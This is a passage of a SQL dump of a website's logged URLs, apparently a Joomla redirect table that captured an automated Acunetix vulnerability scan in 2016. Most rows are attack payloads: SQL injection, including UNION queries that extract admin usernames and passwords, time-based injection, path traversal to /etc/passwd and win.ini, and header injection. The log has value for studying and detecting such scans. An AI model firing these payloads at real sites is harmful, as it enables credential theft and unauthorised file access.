00:00:00'),(279,'http://www.lider-26.ru/index.php/1e309-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:09','0000-00-00 00:00:00'),(280,'http://www.lider-26.ru/index.php/%29-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:09','0000-00-00 00:00:00'),(281,'http://www.lider-26.ru/index.php/%21%28%28%29%26%26%21%7c*%7c*%7c-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:10','0000-00-00 00:00:00'),(282,'http://www.lider-26.ru/index.php/%5e%28%23%24%21%40%23%24%29%28%28%29%29%29******-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:10','0000-00-00 00:00:00'),(283,'http://www.lider-26.ru/index.php/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:15','0000-00-00 00:00:00'),(284,'http://www.lider-26.ru/index.php/9-%e3h/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:16','0000-00-00 00:00:00'),(285,'http://www.lider-26.ru/index.php/9-..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:16','0000-00-00 00:00:00'),(286,'http://www.lider-26.ru/index.php/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d%5c-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:16','0000-00-00 00:00:00'),(287,'http://www.lider-26.ru/index.php/9-..%c0%af/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:17','0000-00-00 00:00:00'),(288,'http://www.lider-26.ru/index.php/9-%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:18','0000-00-00 00:00:00'),(289,'http://www.lider-26.ru/index.php/%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29-icetheme/index','','','',1,0,'2016-08-27 01:33:19','0000-00-00 00:00:00'),(290,'http://www.lider-26.ru/index.php/%27%22-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:20','0000-00-00 00:00:00'),(291,'http://www.lider-26.ru/index.php/%3c%21---icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:21','0000-00-00 00:00:00'),(292,'http://www.lider-26.ru/index.php/1%27%22-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:21','0000-00-00 00:00:00'),(293,'http://www.lider-26.ru/index.php/%40%40ZVzAr-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:22','0000-00-00 00:00:00'),(294,'http://www.lider-26.ru/index.php/JyI%3d-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:23','0000-00-00 00:00:00'),(295,'http://www.lider-26.ru/index.php/%bf%27%bf%22-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:23','0000-00-00 00:00:00'),(296,'http://www.lider-26.ru/index.php/%f0%27%27%f0%22%22-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:24','0000-00-00 00:00:00'),(297,'http://www.lider-26.ru/index.php/OTg4NTEw-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:25','0000-00-00 00:00:00'),(298,'http://www.lider-26.ru/index.php/9-icetheme/%e3h.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:27','0000-00-00 00:00:00'),(299,'http://www.lider-26.ru/index.php/-1%27%20or%20%273%27%3d%273-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:28','0000-00-00 00:00:00'),(300,'http://www.lider-26.ru/index.php?option=com_phpantihacker','','','',1,0,'2016-08-27 01:33:29','0000-00-00 00:00:00'),(301,'http://www.lider-26.ru/index.php/9-icetheme/..%c0%af.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:29','0000-00-00 00:00:00'),(302,'http://www.lider-26.ru/index.php/-1%27%20or%20%273%27%3d%270-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:29','0000-00-00 00:00:00'),(303,'http://www.lider-26.ru/index.php/-1%22%20or%20%223%22%3d%223-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:30','0000-00-00 00:00:00'),(304,'http://www.lider-26.ru/index.php/-1%22%20or%20%223%22%3d%220-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:31','0000-00-00 00:00:00'),(305,'http://www.lider-26.ru/index.php/9-icetheme/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:32','0000-00-00 00:00:00'),(306,'http://www.lider-26.ru/index.php/9-icetheme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:37','0000-00-00 00:00:00'),(307,'http://www.lider-26.ru/index.php?option=com_h40xr','','http://http://www.lider-26.ru/','',1,0,'2016-08-27 01:33:38','0000-00-00 00:00:00'),(308,'http://www.lider-26.ru/index.php/9-icetheme/index.php/%e3h/module-positions','','','',1,0,'2016-08-27 01:33:48','0000-00-00 00:00:00'),(309,'http://www.lider-26.ru/index.php/9-icetheme/index.php/..%c0%af/module-positions','','','',1,0,'2016-08-27 01:33:49','0000-00-00 00:00:00'),(310,'http://www.lider-26.ru/index.php/9-icetheme/index.php/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd/module-positions','','','',1,0,'2016-08-27 01:33:59','0000-00-00 00:00:00'),(311,'http://www.lider-26.ru/index.php/9-icetheme/index.php/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini/module-positions','','','',1,0,'2016-08-27 01:34:01','0000-00-00 00:00:00'),(312,'http://www.lider-26.ru/index.php/9-%bf%27%bf%22/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:34:06','0000-00-00 00:00:00'),(313,'http://www.lider-26.ru/index.php/9-icetheme/index.php/theme/268435455','','','',1,0,'2016-08-27 01:34:07','0000-00-00 00:00:00'),(314,'http://www.lider-26.ru/index.php/9-%f0%27%27%f0%22%22/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:34:07','0000-00-00 00:00:00'),(315,'http://www.lider-26.ru/index.php/9-icetheme/index.php/theme/%e3h','','','',1,0,'2016-08-27 01:34:09','0000-00-00 00:00:00'),(316,'http://www.lider-26.ru/index.php/9-icetheme/index.php/theme/..%c0%af','','','',1,0,'2016-08-27 01:34:11','0000-00-00 00:00:00'),(317,'http://www.lider-26.ru/index.php/9-icetheme/index.php/theme/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd','','','',1,0,'2016-08-27 01:34:17','0000-00-00 00:00:00'),(318,'http://www.lider-26.ru/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--','','http://http://www.lider-26.ru/','',1,0,'2016-08-27 01:34:19','0000-00-00 00:00:00'),(319,'http://www.lider-26.ru/index.php/9-icetheme/index.php/theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini','','','',1,0,'2016-08-27 01:34:19','0000-00-00 00:00:00'),(320,'http://www.lider-26.ru/index.php/9-icetheme/%bf%27%bf%22.php/theme/module-positions','','','',1,0,'2016-08-27 01:34:19','0000-00-00 00:00:00'),(321,'http://www.lider-26.ru/index.php/9-icetheme/%f0%27%27%f0%22%22.php/theme/module-positions','','','',1,0,'2016-08-27 01:34:21','0000-00-00 00:00:00'),(322,'http://www.lider-26.ru/index.php/9-icetheme/index.php/%bf%27%bf%22/module-positions','','','',1,0,'2016-08-27 01:34:31','0000-00-00 00:00:00'),(323,'http://www.lider-26.ru/index.php/9-icetheme/index.php/%f0%27%27%f0%22%22/module-positions','','','',1,0,'2016-08-27 01:34:32','0000-00-00 00:00:00'),(324,'http://www.lider-26.ru/index.php/9-icetheme/index.php/theme/%bf%27%bf%22','','','',1,0,'2016-08-27 01:34:45','0000-00-00 00:00:00'),(325,'http://www.lider-26.ru/index.php/9-icetheme/index.php/theme/%f0%27%27%f0%22%22','','','',1,0,'2016-08-27 01:34:46','0000-00-00 00:00:00'),(326,'http://www.lider-26.ru/index.php/%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs/search/','','','',1,0,'2016-08-27 01:38:41','0000-00-00 00:00:00'),(327,'http://www.lider-26.ru/index.php/%26dir/search/','','','',1,0,'2016-08-27 01:38:42','0000-00-00 00:00:00'),(328,'http://www.lider-26.ru/index.php/%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs/users/','','','',1,0,'2016-08-27 01:38:42','0000-00-00 00:00:00'),(329,'http://www.lider-26.ru/index.php/%7cdir/search/','','','',1,0,'2016-08-27 01:38:43','0000-00-00 00:00:00'),(330,'http://www.lider-26.ru/index.php/component/%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs/','','','',1,0,'2016-08-27 01:38:44','0000-00-00 00:00:00'),(331,'http://www.lider-26.ru/index.php/dAosJV3p/search/','','','',1,0,'2016-08-27 01:38:44','0000-00-00 00:00:00'),(332,'http://www.lider-26.ru/index.php/%26dir/users/','','','',1,0,'2016-08-27 01:38:46','0000-00-00 00:00:00'),(333,'http://www.lider-26.ru/index.php/%7cdir/users/','','','',1,0,'2016-08-27 01:38:47','0000-00-00 00:00:00'),(334,'http://www.lider-26.ru/index.php/component%27%20and%20%273%27%3d%273/search/','','','',1,0,'2016-08-27 01:38:49','0000-00-00 00:00:00'),(335,'http://www.lider-26.ru/index.php/component/%26dir/','','','',1,0,'2016-08-27 01:38:49','0000-00-00 00:00:00'),(336,'http://www.lider-26.ru/index.php/component%27%20and%20%273%27%3d%273%27%20--%20/search/','','','',1,0,'2016-08-27 01:38:50','0000-00-00 00:00:00'),(337,'http://www.lider-26.ru/index.php/component/%7cdir/','','','',1,0,'2016-08-27 01:38:50','0000-00-00 00:00:00'),(338,'http://www.lider-26.ru/index.php/component%22%20and%20%223%22%3d%223/search/','','','',1,0,'2016-08-27 01:38:51','0000-00-00 00:00:00'),(339,'http://www.lider-26.ru/index.php/-1%27%20or%20%273%27%3d%273/search/','','','',1,0,'2016-08-27 01:38:52','0000-00-00 00:00:00'),(340,'http://www.lider-26.ru/index.php/-1%27%20or%20%273%27%3d%270/search/','','','',1,0,'2016-08-27 01:38:53','0000-00-00 00:00:00'),(341,'http://www.lider-26.ru/index.php/-1%22%20or%20%223%22%3d%223/search/','','','',1,0,'2016-08-27 01:38:54','0000-00-00 00:00:00'),(342,'http://www.lider-26.ru/index.php/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd/search/','','','',1,0,'2016-08-27 01:38:55','0000-00-00 00:00:00'),(343,'http://www.lider-26.ru/index.php/-1%22%20or%20%223%22%3d%220/search/','','','',1,0,'2016-08-27 01:38:55','0000-00-00 00:00:00'),(344,'http://www.lider-26.ru/index.php/component%27%20and%20sleep%284%29%3d%27/search/','','','',1,0,'2016-08-27 01:38:57','0000-00-00 00:00:00'),(345,'http://www.lider-26.ru/index.php/Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n/search/','','','',1,0,'2016-08-27 01:38:57','0000-00-00 00:00:00'),(346,'http://www.lider-26.ru/index.php/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png/search/','','','',1,0,'2016-08-27 01:38:58','0000-00-00 00:00:00'),(347,'http://www.lider-26.ru/index.php/component%27%20and%20%28sleep%284%29%2b1%29%20limit%201%20--%20/search/','','','',1,0,'2016-08-27 01:38:58','0000-00-00 00:00:00'),(348,'http://www.lider-26.ru/index.php//search/','','','',1,0,'2016-08-27 01:38:59','0000-00-00 00:00:00'),(349,'http://www.lider-26.ru/index.php/component%22%20and%20sleep%284%29%3d%22/search/','','','',1,0,'2016-08-27 01:38:59','0000-00-00 00:00:00'),(350,'http://www.lider-26.ru/index.php/268435455/search/','','','',1,0,'2016-08-27 01:39:00','0000-00-00 00:00:00'),(351,'http://www.lider-26.ru/index.php/component%27%20or%20%28sleep%284%29%2b1%29%20limit%201%20--%20/search/','','','',1,0,'2016-08-27 01:39:00','0000-00-00 00:00:00'),(352,'http://www.lider-26.ru/index.php/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd/search/','','','',1,0,'2016-08-27 01:39:00','0000-00-00 00:00:00'),(353,'http://www.lider-26.ru/index.php/%e3h/search/','','','',1,0,'2016-08-27 01:39:01','0000-00-00 00:00:00'),(354,'http://www.lider-26.ru/index.php/component%22%20or%20%28sleep%284%29%2b1%29%20limit%201%20--%20/search/','','','',1,0,'2016-08-27 01:39:01','0000-00-00 00:00:00'),(355,'http://www.lider-26.ru/index.php/..%c0%af/search/','','','',1,0,'2016-08-27 01:39:02','0000-00-00 00:00:00'),(356,'http://www.lider-26.ru/index.php/component%27%3dsleep%284%29%3d%27/search/','','','',1,0,'2016-08-27 01:39:02','0000-00-00 00:00:00'),(357,'http://www.lider-26.ru/index.php/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini/search/','','','',1,0,'2016-08-27 01:39:03','0000-00-00 00:00:00'),(358,'http://www.lider-26.ru/index.php/1e309/search/','','','',1,0,'2016-08-27 01:39:03','0000-00-00 00:00:00'),(359,'http://www.lider-26.ru/index.php/component%22%3dsleep%284%29%3d%22/search/','','','',1,0,'2016-08-27 01:39:04','0000-00-00 00:00:00'),(360,'http://www.lider-26.ru/index.php/................windowswin.ini/search/','','','',1,0,'2016-08-27 01:39:04','0000-00-00 00:00:00'),(361,'http://www.lider-26.ru/index.php/component%27%3b%20waitfor%20delay%20%270%3a0%3a4%27%20--%20/search/','','','',1,0,'2016-08-27 01:39:05','0000-00-00 00:00:00'),(362,'http://www.lider-26.ru/index.php/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini/search/','','','',1,0,'2016-08-27 01:39:05','0000-00-00 00:00:00'),(363,'http://www.lider-26.ru/index.php//users/','','','',1,0,'2016-08-27 01:39:06','0000-00-00 00:00:00'),(364,'http://www.lider-26.ru/index.php/1some_inexistent_file_with_long_name/search/','','','',1,0,'2016-08-27 01:39:06','0000-00-00 00:00:00'),(365,'http://www.lider-26.ru/index.php/component%22%3b%20waitfor%20delay%20%270%3a0%3a4%27%20--%20/search/','','','',1,0,'2016-08-27 01:39:06','0000-00-00 00:00:00'),(366,'http://www.lider-26.ru/index.php/268435455/users/','','','',1,0,'2016-08-27 01:39:06','0000-00-00 00:00:00'),(367,'http://www.lider-26.ru/index.php/%e3h/users/','','','',1,0,'2016-08-27 01:39:07','0000-00-00 00:00:00'),(368,'http://www.lider-26.ru/index.php/1some_inexistent_file_with_long_name/users/','','','',1,0,'2016-08-27 01:39:08','0000-00-00 00:00:00'),(369,'http://www.lider-26.ru/index.php/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd/users/','','','',1,0,'2016-08-27 01:39:08','0000-00-00 00:00:00'),(370,'http://www.lider-26.ru/index.php/..%c0%af/users/','','','',1,0,'2016-08-27 01:39:08','0000-00-00 00:00:00'),(371,'http://www.lider-26.ru/index.php/component/1some_inexistent_file_with_long_name/','','','',1,0,'2016-08-27 01:39:09','0000-00-00 00:00:00'),(372,'http://www.lider-26.ru/index.php/Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n/users/','','','',1,0,'2016-08-27 01:39:09','0000-00-00 00:00:00'),(373,'http://www.lider-26.ru/index.php/JvRHBTjJ/users/','','','',1,0,'2016-08-27 01:39:09','0000-00-00 00:00:00'),(374,'http://www.lider-26.ru/index.php/1e309/users/','','','',1,0,'2016-08-27 01:39:10','0000-00-00 00:00:00'),(375,'http://www.lider-26.ru/index.php/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png/users/','','','',1,0,'2016-08-27 01:39:10','0000-00-00 00:00:00'),(376,'http://www.lider-26.ru/index.php/b01FRVQ1bjdt/search/','','','',1,0,'2016-08-27 01:39:10','0000-00-00 00:00:00'),(377,'http://www.lider-26.ru/index.php/UEhuUEVySkFh/users/','','','',1,0,'2016-08-27 01:39:13','0000-00-00 00:00:00'),(378,'http://www.lider-26.ru/index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999UNIONSELECT1,username,password,4,5,6,7,8FROMjos_users','','','',1,0,'2016-08-27 01:39:13','0000-00-00 00:00:00'),(379,'http://www.lider-26.ru/index.php/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd/users/','','','',1,0,'2016-08-27 01:39:14','0000-00-00 00:00:00'),(380,'http://www.lider-26.ru/index.php/component//','','','',1,0,'2016-08-27 01:39:15','0000-00-00 00:00:00'),(381,'http://www.lider-26.ru/index.php/component%26n977668%3dv911332/search/','','','',1,0,'2016-08-27 01:39:15','0000-00-00 00:00:00'),(382,'http://www.lider-26.ru/index.php/component/268435455/','','','',1,0,'2016-08-27 01:39:16','0000-00-00 00:00:00'),(383,'http://www.lider-26.ru/index.php/component/search%26n988445%3dv988184/','','','',1,0,'2016-08-27 01:39:16','0000-00-00 00:00:00'),(384,'http://www.lider-26.ru/index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:39:17','0000-00-00 00:00:00'),(385,'http://www.lider-26.ru/index.php/component%27%20and%20%273%27%3d%273/users/','','','',1,0,'2016-08-27 01:39:17','0000-00-00 00:00:00'),(386,'http://www.lider-26.ru/index.php/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini/users/','','','',1,0,'2016-08-27 01:39:17','0000-00-00 00:00:00'),(387,'http://www.lider-26.ru/index.php/component/%e3h/','','','',1,0,'2016-08-27 01:39:17','0000-00-00 00:00:00'),(388,'http://www.lider-26.ru/index.php/................windowswin.ini/users/','','','',1,0,'2016-08-27 01:39:18','0000-00-00 00:00:00'),(389,'http://www.lider-26.ru/index.php/component%27%20and%20%273%27%3d%273%27%20--%20/users/','','','',1,0,'2016-08-27 01:39:18','0000-00-00 00:00:00'),(390,'http://www.lider-26.ru/index.php/%29/search/','','','',1,0,'2016-08-27 01:39:18','0000-00-00 00:00:00'),(391,'http://www.lider-26.ru/index.php/component/..%c0%af/','','','',1,0,'2016-08-27 01:39:19','0000-00-00 00:00:00'),(392,'http://www.lider-26.ru/index.php/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini/users/','','','',1,0,'2016-08-27 01:39:19','0000-00-00 00:00:00'),(393,'http://www.lider-26.ru/index.php/component%22%20and%20%223%22%3d%223/users/','','','',1,0,'2016-08-27 01:39:19','0000-00-00 00:00:00'),(394,'http://www.lider-26.ru/index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1OR(SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))','','','',1,0,'2016-08-27 01:39:19','0000-00-00 00:00:00'),(395,'http://www.lider-26.ru/index.php/%21%28%28%29%26%26%21%7c*%7c*%7c/search/','','','',1,0,'2016-08-27 01:39:19','0000-00-00 00:00:00'),(396,'http://www.lider-26.ru/index.php/component/1e309/','','','',1,0,'2016-08-27 01:39:20','0000-00-00 00:00:00'),(397,'http://www.lider-26.ru/index.php/-1%27%20or%20%273%27%3d%273/users/','','','',1,0,'2016-08-27 01:39:20','0000-00-00 00:00:00'),(398,'http://www.lider-26.ru/index.php/%5e%28%23%24%21%40%23%24%29%28%28%29%29%29******/search/','','','',1,0,'2016-08-27 01:39:20','0000-00-00 00:00:00'),(399,'http://www.lider-26.ru/index.php/-1%27%20or%20%273%27%3d%270/users/','','','',1,0,'2016-08-27 01:39:21','0000-00-00 00:00:00'),(400,'http://www.lider-26.ru/index.php/component/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd/','','','',1,0,'2016-08-27 01:39:21','0000-00-00 00:00:00'),(401,'http://www.lider-26.ru/index.php/%29/users/','','','',1,0,'2016-08-27 01:39:21','0000-00-00 00:00:00'),(402,'http://www.lider-26.ru/index.php/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d/search/','','','',1,0,'2016-08-27 01:39:21','0000-00-00 00:00:00'),(403,'http://www.lider-26.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=','','','',1,0,'2016-08-27 01:39:22','0000-00-00 00:00:00'),(404,'http://www.lider-26.ru/index.php/-1%22%20or%20%223%22%3d%223/users/','','','',1,0,'2016-08-27 01:39:22','0000-00-00 00:00:00'),(405,'http://www.lider-26.ru/index.php/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d%5c/search/','','','',1,0,'2016-08-27 01:39:22','0000-00-00 00:00:00'),(406,'http://www.lider-26.ru/index.php/%21%28%28%29%26%26%21%7c*%7c*%7c/users/','','','',1,0,'2016-08-27 01:39:22','0000-00-00 00:00:00'),(407,'http://www.lider-26.ru/index.php/component/Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n/','','','',1,0,'2016-08-27 01:39:23','0000-00-00 00:00:00'),(408,'http://www.lider-26.ru/index.php/%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29/search/','','','',1,0,'2016-08-27 01:39:23','0000-00-00 00:00:00'),(409,'http://www.lider-26.ru/index.php/-1%22%20or%20%223%22%3d%220/users/','','','',1,0,'2016-08-27 01:39:23','0000-00-00 00:00:00'),(410,'http://www.lider-26.ru/index.php/component/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png/','','','',1,0,'2016-08-27 01:39:24','0000-00-00 00:00:00'),(411,'http://www.lider-26.ru/index.php/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d/users/','','','',1,0,'2016-08-27 01:39:24','0000-00-00 00:00:00'),(412,'http://www.lider-26.ru/index.php/%5e%28%23%24%21%40%23%24%29%28%28%29%29%29******/users/','','','',1,0,'2016-08-27 01:39:24','0000-00-00 00:00:00'),(413,'http://www.lider-26.ru/index.php/%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29/users/','','','',1,0,'2016-08-27 01:39:24','0000-00-00 00:00:00'),(414,'http://www.lider-26.ru/index.php/%27%22/search/','','','',1,0,'2016-08-27 01:39:24','0000-00-00 00:00:00'),(415,'http://www.lider-26.ru/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1','','','',1,0,'2016-08-27 01:39:25','0000-00-00 00:00:00'),(416,'http://www.lider-26.ru/index.php/%3c%21--/search/','','','',1,0,'2016-08-27 01:39:26','0000-00-00 00:00:00'),(417,'http://www.lider-26.ru/index.php/component/%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29/','','','',1,0,'2016-08-27 01:39:26','0000-00-00 00:00:00'),(418,'http://www.lider-26.ru/index.php/component/%29/','','','',1,0,'2016-08-27 01:39:26','0000-00-00 00:00:00'),(419,'http://www.lider-26.ru/index.php/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d%5c/users/','','','',1,0,'2016-08-27 01:39:26','0000-00-00 00:00:00'),(420,'http://www.lider-26.ru/index.php/component/yR8uCxIU/','','','',1,0,'2016-08-27 01:39:26','0000-00-00 00:00:00'),(421,'http://www.lider-26.ru/index.php/component/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd/','','','',1,0,'2016-08-27 01:39:26','0000-00-00 00:00:00'),(422,'http://www.lider-26.ru/index.php/%27%22/users/','','','',1,0,'2016-08-27 01:39:27','0000-00-00 00:00:00'),(423,'http://www.lider-26.ru/index.php/component/%21%28%28%29%26%26%21%7c*%7c*%7c/','','','',1,0,'2016-08-27 01:39:27','0000-00-00 00:00:00'),(424,'http://www.lider-26.ru/index.php/component/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d/','','','',1,0,'2016-08-27 01:39:27','0000-00-00 00:00:00'),(425,'http://www.lider-26.ru/index.php?option=com_timetrack&view=timetrack&ct_id=-1UNIONSELECT1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password)FROMjos_users','','','',1,0,'2016-08-27 01:39:28','0000-00-00 00:00:00'),(426,'http://www.lider-26.ru/index.php/component/%5e%28%23%24%21%40%23%24%29%28%28%29%29%29******/','','','',1,0,'2016-08-27 01:39:28','0000-00-00 00:00:00'),(427,'http://www.lider-26.ru/index.php/%3c%21--/users/','','','',1,0,'2016-08-27 01:39:28','0000-00-00 00:00:00'),(428,'http://www.lider-26.ru/index.php/component/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d%5c/','','','',1,0,'2016-08-27 01:39:29','0000-00-00 00:00:00'),(429,'http://www.lider-26.ru/index.php/component/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini/','','','',1,0,'2016-08-27 01:39:29','0000-00-00 00:00:00'),(430,'http://www.lider-26.ru/index.php/1%27%22/search/','','','',1,0,'2016-08-27 01:39:29','0000-00-00 00:00:00'),(431,'http://www.lider-26.ru/index.php/component/................windowswin.ini/','','','',1,0,'2016-08-27 01:39:31','0000-00-00 00:00:00'),(432,'http://www.lider-26.ru/index.php/component/%27%22/','','','',1,0,'2016-08-27 01:39:31','0000-00-00 00:00:00'),(433,'http://www.lider-26.ru/index.php?option=com_jgen&task=view&id=','','','',1,0,'2016-08-27 01:39:32','0000-00-00 00:00:00'),(434,'http://www.lider-26.ru/index.php/%40%40lwwcr/search/','','','',1,0,'2016-08-27 01:39:32','0000-00-00 00:00:00'),(435,'http://www.lider-26.ru/index.php/component/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini/','','','',1,0,'2016-08-27 01:39:32','0000-00-00 00:00:00'),(436,'http://www.lider-26.ru/index.php/component/%3c%21--/','','','',1,0,'2016-08-27 01:39:32','0000-00-00 00:00:00'),(437,'http://www.lider-26.ru/index.php/OTI5Mzcz/search/','','','',1,0,'2016-08-27 01:39:32','0000-00-00 00:00:00'),(438,'http://www.lider-26.ru/index.php/component/users%27%20and%20%273%27%3d%273/','','','',1,0,'2016-08-27 01:39:33','0000-00-00 00:00:00'),(439,'http://www.lider-26.ru/index.php/JyI%3d/search/','','','',1,0,'2016-08-27 01:39:33','0000-00-00 00:00:00'),(440,'http://www.lider-26.ru/index.php/OTQ2NzM1/users/','','','',1,0,'2016-08-27 01:39:34','0000-00-00 00:00:00'),(441,'http://www.lider-26.ru/index.php/component/users%27%20and%20%273%27%3d%273%27%20--%20/','','','',1,0,'2016-08-27 01:39:35','0000-00-00 00:00:00'),(442,'http://www.lider-26.ru/index.php/%bf%27%bf%22/search/','','','',1,0,'2016-08-27 